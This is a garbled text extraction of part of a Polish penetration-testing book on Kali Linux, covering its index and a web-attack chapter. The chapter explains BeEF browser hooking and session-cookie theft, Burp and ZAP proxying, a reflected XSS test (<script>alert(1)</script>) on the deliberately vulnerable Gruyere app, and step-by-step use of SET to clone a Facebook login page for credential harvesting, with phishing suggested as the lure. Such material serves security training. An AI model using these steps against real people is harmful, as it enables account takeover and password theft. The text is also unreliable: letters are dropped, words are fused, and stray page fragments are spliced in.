i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 10: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

233

apt-get updateapt-get install beef-xss

Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF

Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku

Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew

Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

234

W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef

Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

